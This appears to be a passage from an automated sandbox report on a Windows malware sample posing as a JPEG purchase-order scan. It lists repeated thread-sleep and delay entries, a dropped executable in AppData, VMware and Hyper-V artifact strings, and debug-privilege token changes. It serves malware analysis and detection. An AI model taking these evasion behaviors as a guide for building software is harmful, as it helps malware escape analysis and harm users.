                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597531
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597421
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597312
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597203
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597093
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596656
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596325
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595889
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595561
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595452
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595124
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594796
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594468
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5931Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3872Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeWindow / User API: threadDelayed 5928Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeWindow / User API: threadDelayed 3902Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeWindow / User API: threadDelayed 1879
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeWindow / User API: threadDelayed 7978
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 1900Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep count: 37 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599883s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7344Thread sleep count: 5928 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7344Thread sleep count: 3902 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599546s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599213s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598999s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598889s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598170s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -598062s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597937s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597609s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597136s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -597030s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596878s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596753s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596345s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -596015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595796s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595468s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595249s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595140s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -595031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594921s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594812s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594593s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594481s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594374s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe TID: 7336Thread sleep time: -594155s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7324Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep count: 35 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -32281802128991695s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7552Thread sleep count: 1879 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7552Thread sleep count: 7978 > 30
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599655s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599327s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598375s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -598155s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597858s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597749s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597531s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597421s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597312s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -597093s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596984s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596875s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596656s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596437s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596325s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596218s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -596109s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595999s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595889s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595781s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595671s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595561s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595452s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595343s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595124s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -595015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594906s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594796s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594687s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594578s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe TID: 7548Thread sleep time: -594468s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599883Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599546Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599213Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598889Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598765Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598656Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeThread delayed: delay time: 598170Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599655
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599327
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598375
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598265
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 598155
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597858
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597749
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597640
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597531
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597421
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597312
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597203
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 597093
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596984
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596875
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596765
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596656
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596546
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596437
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596325
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596218
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 596109
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595999
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595889
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595781
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595671
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595561
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595452
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595343
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595234
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595124
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 595015
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594906
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594796
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594687
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594578
                  Source: C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exeThread delayed: delay time: 594468
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000000.00000002.1731934591.00000000014C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h`N
                  Source: HJnkiZjAPsec.exe, 00000008.00000002.1777024069.0000000001062000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: HJnkiZjAPsec.exe, 0000000B.00000002.4129499108.0000000000F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                  Source: Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe, 00000006.00000002.4129429491.0000000000E06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeCode function: 6_2_06919328 LdrInitializeThunk,LdrInitializeThunk,6_2_06919328
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeProcess token adjusted: DebugJump to behavior
